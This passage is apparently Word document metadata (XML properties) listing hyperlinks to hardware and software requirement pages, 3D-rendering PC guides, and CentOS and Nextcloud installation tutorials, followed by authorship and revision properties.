        <vt:lpwstr>https://support.corel.com/hc/en-us/articles/219326157-CorelDRAW-Graphics-Suite-X8-System-Requirements</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3538980</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>45</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://knowledge.autodesk.com/support/autocad/troubleshooting/caas/sfdcarticles/sfdcarticles/System-requirements-for-AutoCAD-2021-including-Specialized-Toolsets.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2752621</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>42</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.cisco.com/c/en/us/products/routers/product-listing.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4915219</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>39</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.intel.com/content/www/us/en/products/processors/core.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7929904</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>36</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.amd.com/en/products/processors-desktop</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4587523</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>33</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://academyofanimatedart.com/a-guide-to-the-best-computer-for-3d-modeling-and-rendering/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6488106</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>30</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.cgdirector.com/best-computer-3d-modeling-rendering/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7602223</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>27</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.cgdirector.com/best-computer-for-animation/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4325443</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>24</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.logicalincrements.com/articles/building-pc-3d-rendering-animation</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4128806</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>21</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.logicalincrements.com/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>852051</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>18</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://upcloud.com/community/tutorials/install-nextcloud-centos/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1638409</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>15</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.linuxbabe.com/redhat/install-nextcloud-rhel-8-centos-8-nginx-lemp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>327769</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>12</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://vitux.com/install-centos-with-virtualbox-on-windows/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507350</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>9</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://linuxhint.com/install_centos8_virtualbox/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5177349</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>6</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://resources.infosecinstitute.com/topic/installing-configuring-centos-7-virtualbox/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>327769</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>3</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://vitux.com/install-centos-with-virtualbox-on-windows/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507350</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://linuxhint.com/install_centos8_virtual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dc:description/>
  <cp:lastModifiedBy>Ausra</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <cp:lastPrinted>2021-01-23T07:48:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-07T12:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-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
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="NotebookType">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="TeamsChannelId">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="CultureName">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="FolderType">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="ContentTypeId">
    <vt:lpwstr>0x010100182B7F8E6512A04496767AD35F3EA194</vt:lpwstr>
  </property>
</Properties>
</file>